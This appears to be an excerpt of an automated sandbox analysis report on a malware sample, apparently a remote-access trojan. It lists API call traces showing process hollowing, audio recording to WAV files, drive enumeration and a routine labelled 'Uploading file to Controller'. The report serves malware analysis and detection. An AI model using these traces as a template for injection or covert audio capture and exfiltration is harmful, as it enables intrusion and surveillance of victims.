                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 032320C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CD8770 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                    • Instruction ID: 94be9302df75f9b9701c66d89d554a67c54b7fa94a619b0ab640890b17ce9074
                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0110F7760434143D144CD29CCF05B7D7ABFAC5311B2B4A76E24BDB654D222A1559680
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CB80EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 15CB8136
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8139
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 15CB814A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB814D
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 15CB815E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8161
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 15CB8172
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8175
                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 15CB8217
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 15CB822F
                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 15CB8245
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 15CB826B
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 15CB82ED
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15CB8301
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 15CB8341
                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 15CB840B
                                                                                                                                                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 15CB8428
                                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 15CB8435
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 15CB844C
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 15CB8457
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15CB8472
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CB847A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                    • API String ID: 4188446516-3035715614
                                                                                                                                                                                    • Opcode ID: 7875240aa9f7ed1f9a704aec2ffc7e8189bceb554fa96703b3248e4784339b46
                                                                                                                                                                                    • Instruction ID: 674b1dee3523e37c8607c01a5c086837165d36c8d7170b8720bbfd8169152ca6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7875240aa9f7ed1f9a704aec2ffc7e8189bceb554fa96703b3248e4784339b46
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A15BB1614301AFDB108F65CC95BABBBE8FF48745F04492AF645D6290DBB1E804CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323D250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0323D259
                                                                                                                                                                                      • Part of subcall function 0323D224: GetProcAddress.KERNEL32(00000000), ref: 0323D23D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                                                                                                    • Opcode ID: 6e920b387e0c9b82bbd9ef357ffc684148cd5e146ab9c53115c8989032661e3d
                                                                                                                                                                                    • Instruction ID: 7bca5a05224b90b2ea8bb6ddbff00c85bb14808b6919eecf6e1fb43c890baacb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e920b387e0c9b82bbd9ef357ffc684148cd5e146ab9c53115c8989032661e3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 684114E5B3930C5B5214FB7D780452ABBD9EA47A103B4901BF408AF609DB70BCC28A29
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBB047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 15CBB13C
                                                                                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 15CBB150
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,15D060A4), ref: 15CBB178
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 15CBB18E
                                                                                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 15CBB1CF
                                                                                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 15CBB1E7
                                                                                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 15CBB1FC
                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 15CBB219
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 15CBB22A
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15CBB23A
                                                                                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 15CBB25C
                                                                                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 15CBB266
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                                    • API String ID: 738084811-1354618412
                                                                                                                                                                                    • Opcode ID: dbce0e5d1c910990a30bb3bb5f662d9e03385a900a97a16b668ec95d1f9aad68
                                                                                                                                                                                    • Instruction ID: 834c1fe65a5b262963e80db46f5827e9e35a0ae086544be6ab10d3cf2646f8e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbce0e5d1c910990a30bb3bb5f662d9e03385a900a97a16b668ec95d1f9aad68
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F517C7A318256AFD614EF64DCD0DAF7B9DEB84299F400829F14682190FF60BD09CB62
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA1A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15CA1AD9
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 15CA1B03
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 15CA1B13
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 15CA1B23
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 15CA1B33
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 15CA1B43
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 15CA1B54
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AAA,00000002,00000000,00000000), ref: 15CA1B65
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AAC,00000004,00000000,00000000), ref: 15CA1B75
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 15CA1B85
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 15CA1B96
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AB6,00000002,00000000,00000000), ref: 15CA1BA7
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 15CA1BB7
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 15CA1BC7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Write$Create
                                                                                                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                                                                                                    • Opcode ID: 3e92e890b2914853753a8040f6633a473c0a8d7ef8be957a689512d9ccc016fe
                                                                                                                                                                                    • Instruction ID: b03bbba265072e557698ae5ac94c24061dd9538a4802addb70f5e82f079b0633
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e92e890b2914853753a8040f6633a473c0a8d7ef8be957a689512d9ccc016fe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51416CB25542187EE210DE52DC85FBB7FECEB89F54F40041AFA44D6080EB65A909DBB3
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBC01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 15CBC036
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 15CBC04E
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 15CBC067
                                                                                                                                                                                    • FindFirstVolumeW.KERNEL32 ref: 15CBC0A2
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 15CBC0B5
                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 15CBC0F9
                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 15CBC114
                                                                                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 15CBC12C
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 15CBC13B
                                                                                                                                                                                    • FindVolumeClose.KERNEL32 ref: 15CBC15B
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CBC173
                                                                                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 15CBC1A0
                                                                                                                                                                                    • lstrcatW.KERNEL32 ref: 15CBC1B9
                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 15CBC1C8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CBC1D0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                                                                                    • Opcode ID: fb3f40d0261f636d571faee48e38a3661602b8c6891ecc328249937cbd53a5a3
                                                                                                                                                                                    • Instruction ID: 1b81c77d4c4d891f57be4930ecfdb1ddf577dc4392fa70804513fd5d7d545ec4
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb3f40d0261f636d571faee48e38a3661602b8c6891ecc328249937cbd53a5a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED418272508356ABDB10DFA0D8889DBB7ECFB84790F004D2AF545D2150EBB4D948CBE2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03246E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 03246E9A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EAB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EBB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246ECB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EDB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EEB
                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 03246EFB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                                                                                    • Opcode ID: 0e1e512a50b2cb903fffe07b256383753e57ccef562a474c128f12ac7549796e
                                                                                                                                                                                    • Instruction ID: 47e796a97874b9aa3de420ee9672171160f5f174d50bf3ccd78f2b32f525b6c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1e512a50b2cb903fffe07b256383753e57ccef562a474c128f12ac7549796e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F0ACE46FA3587EE704FB706CC682E2A5CA513544385641966766DD07EAF889C04F20
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF12C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 15CF130A
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF051F
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0531
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0543
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0555
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0567
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0579
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF058B
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF059D
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05AF
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05C1
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05D3
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05E5
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05F7
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF12FF
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1321
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1336
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1341
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1363
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1376
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1384
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF138F
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13C7
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13CE
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13EB
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1403
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    • Opcode ID: c5cafa537da19e9f3cd02c91144cf725b10d711e096e26fdc59ac8d53182a8a7
                                                                                                                                                                                    • Instruction ID: d8074eeab03451a1b8f115d2d466a3d7fa2c3db6a423d254936852f277fe778a
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5cafa537da19e9f3cd02c91144cf725b10d711e096e26fdc59ac8d53182a8a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: A3316D36A043059FEB508E7AE880B5A7BE9FF82311F509D1AE46AD7650DF34FD848B50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA8B7A Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 15CA8CE3
                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 15CA8D1B
                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 15CA8D4D
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 15CA8E70
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 15CA8E8B
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8F64
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8FAE
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8FFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                                                                                                    • API String ID: 3086580692-2596673759
                                                                                                                                                                                    • Opcode ID: 3981442b72a02c8e57059b5b9013411d1d93afbf009fdbb88178ae1c0b4c6f11
                                                                                                                                                                                    • Instruction ID: 03fa7dbab317be0520cbc9c095bf977f8b961037f1252ced581c7fdf2fc0772f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3981442b72a02c8e57059b5b9013411d1d93afbf009fdbb88178ae1c0b4c6f11
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B1803A6083529BC714DF64CC90AAFBBE6AFC4254F404D1DF58A92290FF70B909CB52
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA48C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • connect.WS2_32(FFFFFFFF,?,?), ref: 15CA48E0
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15CA4A00
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15CA4A0E
                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 15CA4A21
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
